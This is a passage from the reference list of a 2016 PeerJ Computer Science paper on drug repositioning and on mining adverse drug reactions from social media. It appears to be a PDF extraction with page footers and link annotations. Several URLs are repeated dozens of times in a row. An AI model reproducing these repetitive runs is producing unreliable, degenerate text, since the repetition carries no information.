Nicolson SE, Nemeroff CB. 2007. Ziprasidone in the treatment of mania in bipolar disorder. Neuropsychiatric Disease and Treatment 3(6):823–834. Nikfarjam A, Sarker A, O’Connor K, Ginn R, Gonzalez G. 2015. Pharmacovigilance from social media: mining adverse drug reaction mentions using sequence labeling with word embedding cluster features. Journal of the American Medical Informatics Association 22(3):671–681 DOI 10.1093/jamia/ocu041. Ogino K, Hatanaka K, Kawamura M, Ohno T, Harada Y. 2000. Meloxicam inhibits prostaglandin E(2) generation via cyclooxygenase 2 in the inflammatory site but not that via cyclooxygenase 1 in the stomach. Pharmacology 61(4):244–250 DOI 10.1159/000028408. Owen RT. 2006. Ramelteon: profile of a new sleep-promoting medication. Drugs Today 42(4):255–263 DOI 10.1358/dot.2006.42.4.970842. Pedersen CA, Gibson CM, Rau SW, Salimi K, Smedley KL, Casey RL, Leserman J, Jarskog LF, Penn DL. 2011. Intranasal oxytocin reduces psychotic symptoms and improves Theory of Mind and social perception in schizophrenia. Schizophrenia Research 132(1):50–53 DOI 10.1016/j.schres.2011.07.027. Rainsford KD, Ying C, Smith FC. 1997. Effects of meloxicam, compared with other NSAIDs, on cartilage proteoglycan metabolism, synovial prostaglandin E2, and production of interleukins 1, 6 and 8, in human and porcine explants in organ culture. Journal of Pharmacy and Pharmacology 49(10):991–998 DOI 10.1111/j.2042-7158.1997.tb06030.x. Ray SD. 2014. Side effects of drugs annual: a worldwide yearly survey of new data in adverse drug reactions. Vol. 36. Amsterdam: Elsevier Science, 2–651. Reinholt FP, Hultenby K, Oldberg A, Heinegard D. 1990. Osteopontin—a possible anchor of osteoclasts to bone. Proceedings of the National Academy of Sciences of the United States of America 87(12):4473–4475 DOI 10.1073/pnas.87.12.4473. Rubin LH, Carter CS, Drogos L, Pournajafi-Nazarloo H, Sweeney JA, Maki PM. 2010. Peripheral oxytocin is associated with reduced symptom severity in schizophrenia. Schizophrenia Research 124(1–3):13–21 DOI 10.1016/j.schres.2010.09.014. Sampathkumar H, Chen XW, Luo B. 2014. Mining adverse drug reactions from online healthcare forums using hidden Markov model. BMC Medical Informatics and Decision Making 14:91 DOI 10.1186/1472-6947-14-91. Sanseau P, Agarwal P, Barnes MR, Pastinen T, Richards JB, Cardon LR, Mooser V. 2012. Use of genome-wide association studies for drug repositioning. Nature Biotechnology 30(4):317–320 DOI 10.1038/nbt.2151. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 22/24 https://peerj.com/computer-science/ http://dx.doi.org/10.1093/bioinformatics/btq430 http://dx.doi.org/10.2165/00002018-200932010-00002 http://dx.doi.org/10.2165/00002018-200932010-00002 http://arxiv.org/abs/1301.3781 http://dx.doi.org/10.1093/jamia/ocu041 http://dx.doi.org/10.1159/000028408 http://dx.doi.org/10.1358/dot.2006.42.4.970842 http://dx.doi.org/10.1016/j.schres.2011.07.027 http://dx.doi.org/10.1111/j.2042-7158.1997.tb06030.x http://dx.doi.org/10.1073/pnas.87.12.4473 http://dx.doi.org/10.1016/j.schres.2010.09.014 http://dx.doi.org/10.1186/1472-6947-14-91 http://dx.doi.org/10.1038/nbt.2151 http://dx.doi.org/10.7717/peerj-cs.46 Sarker A, Gonzalez G. 2015. Portable automatic text classification for adverse drug reaction detection via multi-corpus training. Journal of Biomedical Informatics 53:196–207 DOI 10.1016/j.jbi.2014.11.002. Schäfer J, Strimmer K. 2005. A shrinkage approach to large-scale covariance matrix estimation and implications for functional genomics. Statistical Applications in Genetics and Molecular Biology 4(1):Article 32 DOI 10.2202/1544-6115.1175. Segura-Bedmar I, Martinez P, Revert R, Moreno-Schneider J. 2015. Exploring Spanish health social media for detecting drug effects. BMC Medical Informatics and Decision Making 15(Suppl 2):S6 DOI 10.1186/1472-6947-15-S2-S6. Shorter K, Farjo NP, Picksley SM, Randall VA. 2008. Human hair follicles contain two forms of ATP-sensitive potassium channels, only one of which is sensitive to minoxidil. FASEB Journal 22(6):1725–1736 DOI 10.1096/fj.07-099424. Sirota M, Dudley JT, Kim J, Chiang AP, Morgan AA, Sweet-Cordero A, Sage J, Butte AJ. 2011. Discovery and preclinical validation of drug indications using compendia of public gene ex- pression data. Science Translational Medicine 3(96):96ra77 DOI 10.1126/scitranslmed.3001318. Sustik MA, Calderhead B. 2012. GLASSOFAST: an efficient GLASSO implementation. UTCS Technical Report TR-12-29 2012. Austin: University of Texas at Austin. Available at http://apps. cs.utexas.edu/tech reports/reports/tr/TR-2105.pdf. Tandon VR, Mahajan V, Khajuria V, Gillani Z. 2015. Under-reporting of adverse drug reactions: a challenge for pharmacovigilance in India. Indian Journal of Pharmacology 47(1):65–71 DOI 10.4103/0253-7613.150344. Tatonetti NP, Ye PP, Daneshjou R, Altman RB. 2012. Data-driven prediction of drug effects and interactions. Science Translational Medicine 4(125):125ra31 DOI 10.1126/scitranslmed.3003377. Thomson Reuters. 2012. Knowledge-based drug repositioning to drive R&D productivity. New York: The Thomson Reuters Corporation. Available at http://thomsonreuters.com/products/ip-science/ 04 038/drug-repositioning-cwp-en.pdf. Thomson Reuters. 2015a. Thomson Reuters Cortellis Clinical Trials Intelligence. Available at http: //go.thomsonreuters.com/cti/ (accessed 30 April 2015). Thomson Reuters. 2015b. Thomson Reuters World Drug Index. Available at http://thomsonreuters. com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ (accessed 30 April 2015). Tobinick EL. 2009. The value of drug repositioning in the current pharmaceutical market. Drug News & Perspectives 22(2):119–125 DOI 10.1358/dnp.2009.22.2.1343228. Twitter. 2015. Twitter.com. Available at http://twitter.com/ (accessed 30 April 2015). US Food and Drug Administraction. 2016. Drugs@FDA: FDA approved drug products. Available at http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ (accessed 30 April 2015). Vanunu O, Magger O, Ruppin E, Shlomi T, Sharan R. 2010. Associating genes and protein complexes with disease via network propagation. PLoS Computational Biology 6(1):e1000641 DOI 10.1371/journal.pcbi.1000641. Vilar S, Uriarte E, Santana L, Lorberbaum T, Hripcsak G, Friedman C, Tatonetti NP. 2014. Similarity-based modeling in large-scale prediction of drug–drug interactions. Nature Protocols 9(9):2147–2163 DOI 10.1038/nprot.2014.151. Wang H, Gu Q, Wei J, Cao Z, Liu Q. 2015. Mining drug-disease relationships as a complement to medical genetics-based drug repositioning: where a recommendation system meets genome-wide association studies. Clinical Pharmacology and Therapeutics 97(5):451–454 DOI 10.1002/cpt.82. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 23/24 https://peerj.com/computer-science/ http://dx.doi.org/10.1016/j.jbi.2014.11.002 http://dx.doi.org/10.2202/1544-6115.1175 http://dx.doi.org/10.1186/1472-6947-15-S2-S6 http://dx.doi.org/10.1096/fj.07-099424 http://dx.doi.org/10.1126/scitranslmed.3001318 http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/TR-2105.pdf http://dx.doi.org/10.4103/0253-7613.150344 http://dx.doi.org/10.1126/scitranslmed.3003377 http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/04_038/drug-repositioning-cwp-en.pdf http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://dx.doi.org/10.1358/dnp.2009.22.2.1343228 http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ 